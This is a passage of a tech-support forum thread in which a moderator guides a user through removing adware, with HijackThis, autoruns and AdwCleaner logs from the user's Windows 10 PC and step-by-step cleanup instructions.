O4 - HKLM\..\Run: [Adobe Creative Cloud] "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
O4 - HKLM\..\Run: [BMISR] C:\Program Files (x86)\KYE\FaceCam 311\BM.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [AvgUi] "C:\Program Files (x86)\AVG\Framework\Common\avguix.exe" /fmw.trayonly
O4 - HKLM\..\Run: [Corsair Utility Engine] "C:\Program Files (x86)\Corsair\Corsair Utility Engine\CorsairHID.exe" --autorun
O4 - HKLM\..\Run: [IObit Malware Fighter] "C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe" /autostart
O4 - HKLM\..\Run: [ApnTBMon] "C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe"
O4 - HKLM\..\Run: [LogMeIn Hamachi Ui] "C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
O4 - HKCU\..\Run: [OneDrive] "C:\Users\Nathan\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [Steam] "C:\Program Files (x86)\Steam\steam.exe" -silent
O4 - HKCU\..\Run: [Spotify] "C:\Users\Nathan\AppData\Roaming\Spotify\Spotify.exe" -autostart -minimized
O4 - HKCU\..\Run: [Selection Tools] "C:\Users\Nathan\AppData\Roaming\WTools\Selection Tools\Selection Tools.exe" /winstartup
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [GoogleChromeAutoLaunch_02408A78B8D1B61DE75168766306C75C] "C:\Users\Nathan\AppData\Local\Chromium\Application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session
O4 - HKCU\..\Run: [GoogleChromeAutoLaunch_14B61C6A02163755AC6E1628BB204E5E] "C:\Users\Nathan\AppData\Local\BrowserAir\Application\BrowserAir.exe" --no-startup-window
O4 - HKCU\..\Run: [CyberGhost] "C:\Program Files\CyberGhost 5\CyberGhost.exe" /autostart /min
O4 - HKCU\..\Run: [GalaxyClient] C:\Program Files (x86)\GalaxyClient\GalaxyClient.exe /launchViaAutoStart
O4 - HKCU\..\Run: [Discord] C:\Users\Nathan\AppData\Local\Discord\app-0.0.296\Discord.exe
O4 - HKCU\..\Run: [Spotify Web Helper] "C:\Users\Nathan\AppData\Roaming\Spotify\SpotifyWebHelper.exe"
O4 - HKCU\..\Run: [SlimCleaner Plus] "C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe" /minimize /boot
O4 - HKCU\..\Run: [Advanced SystemCare 9] "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe" /Auto
O4 - HKCU\..\Run: [EADM] "C:\Program Files (x86)\Origin\Origin.exe" -AutoStart
O4 - HKCU\..\Run: [GoogleChromeAutoLaunch_03D75E4CDB7EC9B07D7B1096AAC5AF87] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
O4 - HKUS\S-1-5-19\..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [] (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [] (User 'Default user')
O4 - Startup: Adobe Gamma.lnk = C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: Free2X Webcam Recorder.lnk = C:\Program Files (x86)\Free2X\Webcam Recorder\WebcamRecorder.exe
O4 - Startup: MEGAsync.lnk = C:\Users\Nathan\AppData\Local\MEGAsync\MEGAsync.exe
O4 - Startup: Xfire.lnk = C:\Program Files (x86)\Xfire\Xfire.exe
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O17 - HKLM\System\CCS\Services\Tcpip\..\{67e00cfb-5556-479c-b546-324048483252}: NameServer = 38.132.106.139,194.187.251.67
O17 - HKLM\System\CCS\Services\Tcpip\..\{a840c0cd-bf92-4d4f-807e-5f3b6f6d0405}: NameServer = 38.132.106.139,194.187.251.67
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: AdobeUpdateService - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
O23 - Service: Advanced SystemCare Service 9 (AdvancedSystemCareService9) - IObit - C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
O23 - Service: Adobe Genuine Software Integrity Service (AGSService) - Adobe Systems, Incorporated - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Ask Update Service (APNMCP) - APN LLC. - C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe
O23 - Service: ASUS Com Service (asComSvc) - Unknown owner - C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe
O23 - Service: AVG Service (avgsvc) - AVG Technologies CZ, s.r.o. - C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
O23 - Service: BattlEye Service (BEService) - Unknown owner - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service: CyberGhost 5 Client Service (CGVPNCliService) - CyberGhost S.R.L - C:\Program Files\CyberGhost 5\Service.exe
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: GalaxyClientService - GOG.com - C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe
O23 - Service: GalaxyCommunication - GOG.com - C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe
O23 - Service: Google Update Service (gupdate) (gupdate) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: IMF Service (IMFservice) - IObit - C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe
O23 - Service: Intel(R) Capability Licensing Service TCP IP Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: LicCtrl Service (LicCtrlService) - Unknown owner - C:\Windows\runservice.exe
O23 - Service: LiveUpdate (LiveUpdateSvc) - IObit - C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: Norton 360 (N360) - Symantec Corporation - C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\N360.exe
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: NVIDIA LocalSystem Container (NvContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA NetworkService Container (NvContainerNetworkService) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA Display Container LS (NVDisplay.ContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
O23 - Service: NVIDIA Wireless Controller Service - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe
O23 - Service: Origin Client Service - Electronic Arts - C:\Program Files (x86)\Origin\OriginClientService.exe
O23 - Service: Origin Web Helper Service - Electronic Arts - C:\Program Files (x86)\Origin\OriginWebHelperService.exe
O23 - Service: Overwolf Updater Windows SCM (OverwolfUpdater) - Overwolf LTD - C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\WINDOWS\System32\SensorDataService.exe (file missing)
O23 - Service: SuperBoost Software Updater (sgbupt) - SuperBoost Software - C:\Program Files (x86)\SuperBoost\SuperBoost Software Updater\SuperBoostUpdater.exe
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: SlimWare Utility Service Launcher (SlimService) - SlimWare Utilities, Inc. - C:\Program Files\SlimService\SlimServiceFactory.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\WINDOWS\system32\TieringEngineService.exe (file missing)
O23 - Service: TunnelBear Maintenance (TunnelBearMaintenance) - Unknown owner - C:\Program Files (x86)\TunnelBear\TBear.Maintenance.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 20411 bytes


Hope this is enough.
 

Malnutrition

Malnurished Mod
Moderator
Security Team
Jul 22, 2016
3,395
551
Removal of Useless Programs.

Remove these items below with Geek Uninstaller.

Advanced SystemCare 9 (HKLM-x32\...\Advanced SystemCare_is1) (Version: 9.4.0 - IObit)
AVG 2016 (HKLM\...\{2272D5BF-6158-4042-9E55-5D0E0793D32E}) (Version: 16.0.4489 - AVG Technologies) Hidden
Driver Booster 3.5 (HKLM-x32\...\Driver Booster_is1) (Version: 3.5 - IObit)
Driver Talent (HKLM-x32\...\{29FE44D7-BC89-4188-8B0E-F6BA073C15A5}_is1) (Version: 6.4.47.146 - OSToto Co., Ltd.)
DriverUpdate (HKLM-x32\...\{75881A1F-A02E-4D88-BCFA-34D86752A0C3}) (Version: 2.6.4 - Slimware Utilities Holdings, Inc.) Hidden
DriverUpdate (HKLM-x32\...\DriverUpdate) (Version: 2.6.4 - Slimware Utilities Holdings, Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
IObit Malware Fighter 4 (HKLM-x32\...\IObit Malware Fighter_is1) (Version: 4.2 - IObit)
IObit Uninstaller (HKLM-x32\...\IObitUninstall) (Version: 5.4.0.125 - IObit)
Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Selection Tools (HKCU\...\Selection Tools) (Version: - WTools)
Yahoo Search Set (HKLM-x32\...\Yahoo! SearchSet) (Version: - Yahoo Inc.)

Run the AVG 2016 64bit removal tool found here.



Fix with HijackThis!

Close all other programs!


Right Click Hijack this, run as administrator.
Click do a system scan only.
Place a tick next to the items below.

O4 - HKLM\..\Run: [PowerDVD15Agent] "C:\Program Files (x86)\CyberLink\PowerDVD15\PowerDVD15Agent.exe"
O4 - HKLM\..\Run: [Adobe Creative Cloud] "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
O4 - HKLM\..\Run: [BMISR] C:\Program Files (x86)\KYE\FaceCam 311\BM.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [AvgUi] "C:\Program Files (x86)\AVG\Framework\Common\avguix.exe" /fmw.trayonly
O4 - HKLM\..\Run: [Corsair Utility Engine] "C:\Program Files (x86)\Corsair\Corsair Utility Engine\CorsairHID.exe" --autorun
O4 - HKLM\..\Run: [IObit Malware Fighter] "C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe" /autostart
O4 - HKLM\..\Run: [ApnTBMon] "C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe"
O4 - HKCU\..\Run: [OneDrive] "C:\Users\Nathan\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [Spotify] "C:\Users\Nathan\AppData\Roaming\Spotify\Spotify.exe" -autostart -minimized
O4 - HKCU\..\Run: [Selection Tools] "C:\Users\Nathan\AppData\Roaming\WTools\Selection Tools\Selection Tools.exe" /winstartup
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [GoogleChromeAutoLaunch_02408A78B8D1B61DE75168766306C75C] "C:\Users\Nathan\AppData\Local\Chromium\Application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session
O4 - HKCU\..\Run: [GoogleChromeAutoLaunch_14B61C6A02163755AC6E1628BB204E5E] "C:\Users\Nathan\AppData\Local\BrowserAir\Application\BrowserAir.exe" --no-startup-window
O4 - HKCU\..\Run: [GalaxyClient] C:\Program Files (x86)\GalaxyClient\GalaxyClient.exe /launchViaAutoStart
O4 - HKCU\..\Run: [Discord] C:\Users\Nathan\AppData\Local\Discord\app-0.0.296\Discord.exe
O4 - HKCU\..\Run: [Spotify Web Helper] "C:\Users\Nathan\AppData\Roaming\Spotify\SpotifyWebHelper.exe"
O4 - HKCU\..\Run: [SlimCleaner Plus] "C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe" /minimize /boot
O4 - HKCU\..\Run: [Advanced SystemCare 9] "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe" /Auto
O4 - HKCU\..\Run: [EADM] "C:\Program Files (x86)\Origin\Origin.exe" -AutoStart
O4 - HKCU\..\Run: [GoogleChromeAutoLaunch_03D75E4CDB7EC9B07D7B1096AAC5AF87] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
O4 - Startup: Adobe Gamma.lnk = C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: Free2X Webcam Recorder.lnk = C:\Program Files (x86)\Free2X\Webcam Recorder\WebcamRecorder.exe
O4 - Startup: MEGAsync.lnk = C:\Users\Nathan\AppData\Local\MEGAsync\MEGAsync.exe
O4 - Startup: Xfire.lnk = C:\Program Files (x86)\Xfire\Xfire.exe

Click fix checked.
Accept the prompt.
Reboot the machine after.

Fix with Autoruns.



Open Autoruns as administrator and under the "Task Scheduler" tab and uncheck these items.


+ "\Adobe Flash Player Updater" "Adobe® Flash® Player Update Service 23.0 r0" "Adobe Systems Incorporated" "c:\windows\syswow64\macromed\flash\flashplayerupdateservice.exe" "30/08/2016 00:01" ""
+ "\ASC9_PerformanceMonitor" "Performance Monitor" "IObit" "c:\program files (x86)\iobit\advanced systemcare\monitor.exe" "26/05/2016 05:53" ""
+ "\ASC9_SkipUac_Nathan" "Advanced SystemCare 9" "IObit" "c:\program files (x86)\iobit\advanced systemcare\asc.exe" "28/07/2016 06:41" ""
+ "\DNSKALAMAZOO" "" "" "File not found: C:\Program Files (x86)\DNS Unlocker\dnskalamazoo.exe" "" ""
+ "\Driver Booster Scheduler" "Driver Booster Scheduler" "IObit" "c:\program files (x86)\iobit\driver booster\scheduler.exe" "13/07/2016 02:14" ""
+ "\Driver Booster SkipUAC (Nathan)" "Driver Booster 3" "IObit" "c:\program files (x86)\iobit\driver booster\driverbooster.exe" "15/07/2016 09:14" ""
+ "\DriverUpdate Scan" "DriverUpdate" "SlimWare Utilities, Inc." "c:\program files (x86)\driverupdate\driverupdate.exe" "12/07/2016 17:57" ""
+ "\DriverUpdate Startup" "DriverUpdate" "SlimWare Utilities, Inc." "c:\program files (x86)\driverupdate\driverupdate.exe" "12/07/2016 17:57" ""
+ "\FRAPS" "Fraps" "Beepa P/L" "c:\fraps\fraps.exe" "05/09/2015 08:02" ""
+ "\IBUpd2" "" "" "File not found: C:\Users\Nathan\AppData\Local\BrowserAir\44.5.0.2\updater.exe" "" ""
+ "\LuckyBrowse" "" "" "File not found: C:\Program Files (x86)\LuckyBrowse\app\luckybrowse.exe" "" ""
+ "\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task" "Windows Live Social Object Extractor Engine" "Microsoft Corporation" "c:\program files (x86)\windows live\soxe\wlsoxe.dll" "01/04/2014 04:28" ""
+ "\Microsoft\Windows\NetTrace\GatherNetworkInfo" "" "" "c:\windows\system32\gathernetworkinfo.vbs" "16/07/2016 11:42" ""
+ "\Microsoft\Windows\Windows Media Sharing\UpdateLibrary" "Windows Media Player Network Sharing Service Configuration Application" "Microsoft Corporation" "c:\program files\windows media player\wmpnscfg.exe" "16/07/2016 02:25" ""
+ "\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}" "NVIDIA nodejs launcher" "NVIDIA Corporation" "c:\program files (x86)\nvidia corporation\nvnode\nvnodejslauncher.exe" "16/11/2016 16:38" ""
+ "\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}" "NVIDIA driver profile updater" "NVIDIA Corporation" "c:\program files\nvidia corporation\update core\nvprofileupdater64.exe" "17/11/2016 10:16" ""
+ "\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}" "NVIDIA driver profile updater" "NVIDIA Corporation" "c:\program files\nvidia corporation\update core\nvprofileupdater64.exe" "17/11/2016 10:16" ""
+ "\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}" "NVIDIA telemetry monitor" "NVIDIA Corporation" "c:\program files (x86)\nvidia corporation\update core\nvtmmon.exe" "17/11/2016 10:12" ""
+ "\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}" "NVIDIA crash and telemetry reporter" "NVIDIA Corporation" "c:\program files (x86)\nvidia corporation\update core\nvtmrep.exe" "17/11/2016 10:11" ""
+ "\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}" "NVIDIA crash and telemetry reporter" "NVIDIA Corporation" "c:\program files (x86)\nvidia corporation\update core\nvtmrep.exe" "17/11/2016 10:11" ""
+ "\Overwolf Updater Task" "OverwolfUpdater" "Overwolf LTD" "c:\program files (x86)\overwolf\overwolfupdater.exe" "23/11/2016 10:47" ""
+ "\Selection Tools Update" "Selection Tools" "Nosibay" "c:\users\nathan\appdata\roaming\wtools\selection tools\selection tools.exe" "17/11/2015 14:25" ""
+ "\SlimCleaner Plus (Scheduled Scan - Nathan)" "SlimCleaner Plus" "Slimware Utilities Holdings, Inc." "c:\program files\slimcleaner plus\slimcleanerplus.exe" "25/07/2016 21:32" ""
+ "\SmartDefrag_AutoAnalyze" "AutoDefrg" "IObit" "c:\program files (x86)\iobit\smart defrag\autodefrag.exe" "06/06/2016 06:54" ""
+ "\SmartDefrag_Startup" "Smart Defrag 5" "IObit" "c:\program files (x86)\iobit\smart defrag\smartdefrag.exe" "27/07/2016 03:06" ""
+ "\SmartDefrag_Update" "Smart Defrag Updater" "IObit" "c:\program files (x86)\iobit\smart defrag\autoupdate.exe" "21/07/2016 11:16" ""
+ "\SuperbGameBoost" "" "SuperBoost Software" "c:\program files (x86)\superboost\superb game boost\superbgameboostmain.exe" "11/05/2016 09:46" ""
+ "\Uninstaller_SkipUac_Nathan" "Uninstall Programs" "IObit" "c:\program files (x86)\iobit\iobit uninstaller\iobituninstaler.exe" "24/06/2016 02:57" ""
+ "\WindApp Update" "" "" "File not found: C:\Users\Nathan\AppData\Roaming\Store\WindApp\WindApp Update.exe" "" ""
+ "\{790A0E47-0508-097E-0F11-0F7A7E0A1104}" "" "" "File not found: bypass" "" ""
+ "\{7D50DE2D-8C63-E41E-4D44-FCDB07020749}" "" "" "File not found: C:\PROGRA~3\89956195\a8be60d6.dll" "" ""

Adware Cleaner Scan.


Please download AdwCleaner by Xplode onto your desktop.

  • Close all open programs and internet browsers.
  • Double click on adwcleaner.exe to run the tool.
  • Click on Scan button.
  • When the scan has finished click on Clean button.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the contents of that logfile with your next reply.
  • You can find the logfile at C:\AdwCleaner[S1].txt as well.

JRT Scan.



Please download Junkware Removal Tool and save it on your desktop.



  • Shut down your anti-virus, anti-spyware, and firewall software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista or Windows 7, right-click it and select Run as administrator.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log is saved to your desktop and will automatically open.
  • Please post the JRT log.

Reset Host File



  • Click here to download RstHosts v2.0
  • Save the file to your desktop.
  • Right Click and Run as Administrator.
  • Click on Restaurer, then click OK at the prompt.
  • This will restore the default host file.
  • Next Click on Creer Un Rapport.
  • This will open a logfile, post that in your next reply.
 

Nathan Turnock

PCHF Member
PCHF Member
Dec 11, 2016
6
3
18
Thank you for all this!

# AdwCleaner v6.040 - Logfile created 11/12/2016 at 17:04:45
# Updated on 02/12/2016 by Malwarebytes
# Database : 2016-12-11.2 [Server]
# Operating System : Windows 10 Home (X64)
# Username : Nathan - DESKTOP-5GKAVDH
# Running from : C:\Users\Nathan\Downloads\adwcleaner_6.040.exe
# Mode: Scan
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****

Service Found: APNMCP
Service Found: swdumon
Service Found: SlimService


***** [ Folders ] *****

Folder Found: C:\Program Files (x86)\F81E5340-1451655362-11E4-BA12-14DDA955CA68
Folder Found: C:\ProgramData\86f71d32-09b7-1
Folder Found: C:\ProgramData\86f71d32-3023-0
Folder Found: C:\ProgramData\86f71d32-6a65-0
Folder Found: C:\ProgramData\86f71d32-7827-1
Folder Found: C:\ProgramData\89956195
Folder Found: C:\ProgramData\dbfc444c-1ad5-0
Folder Found: C:\ProgramData\dbfc444c-31c1-0
Folder Found: C:\ProgramData\dbfc444c-37e5-1
Folder Found: C:\ProgramData\dbfc444c-4963-1
Folder Found: C:\ProgramData\dbfc444c-59b5-0
Folder Found: C:\ProgramData\dbfc444c-6185-0
Folder Found: C:\ProgramData\dbfc444c-6983-1
Folder Found: C:\ProgramData\{0a2f43c8-712c-1}
Folder Found: C:\ProgramData\{184175d8-712c-0}
Folder Found: C:\Users\Nathan\AppData\Local\BrowserAir
Folder Found: C:\Users\Nathan\AppData\Local\slimware utilities inc
Folder Found: C:\Users\Nathan\AppData\Local\TrailerTime
Folder Found: C:\Users\Nathan\AppData\Local\YSearchUtil
Folder Found: C:\Users\Nathan\AppData\Local\Downloaded Installers
Folder Found: C:\Users\Nathan\AppData\Local\SlimWare Utilities Inc
Folder Found: C:\Users\Nathan\AppData\Roaming\WTools
Folder Found: C:\Users\Nathan\AppData\Roaming\SpringFiles
Folder Found: C:\Users\Nathan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BrowserAir
Folder Found: C:\Program Files\AmazingTab
Folder Found: C:\Program Files\amztab
Folder Found: C:\Program Files\slimcleaner plus
Folder Found: C:\Program Files\slimservice
Folder Found: C:\Program Files\SlimCleaner Plus
Folder Found: C:\Program Files\SlimService
Folder Found: C:\ProgramData\apn
Folder Found: C:\ProgramData\AskPartnerNetwork
Folder Found: C:\ProgramData\LuckyBrowse
Folder Found: C:\ProgramData\slimware utilities inc
Folder Found: C:\ProgramData\Thunder Network
Folder Found: C:\ProgramData\SlimWare Utilities Inc
Folder Found: C:\ProgramData\thunder network
Folder Found: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\slimcleaner plus
Folder Found: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WNEn
Folder Found: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SlimCleaner Plus
Folder Found: C:\Users\Public\Documents\Downloaded Installers
Folder Found: C:\ProgramData\Microsoft\Windows\Start Menu\LuckyBrowse
Folder Found: C:\ProgramData\Microsoft\Windows\Start Menu\SpringFiles
Folder Found: C:\Program Files (x86)\AskPartnerNetwork
Folder Found: C:\Program Files (x86)\ExploreTech
Folder Found: C:\Program Files (x86)\LuckyBrowse
Folder Found: C:\Program Files (x86)\SpringFiles
Folder Found: C:\Users\Nathan\AppData\Local\Temp\apn
Folder Found: C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\npdicihegicnhaangkdmcgbjceoemeoo
Folder Found: C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\libedajeiljdoodmokbppgapcfbignci


***** [ Files ] *****

File Found: C:\Users\Nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\BrowserAir.lnk
File Found: C:\WINDOWS\SysNative\drivers\swdumon.sys
File Found: C:\WINDOWS\SysNative\drivers\sdfhgdf.sys
File Found: C:\END
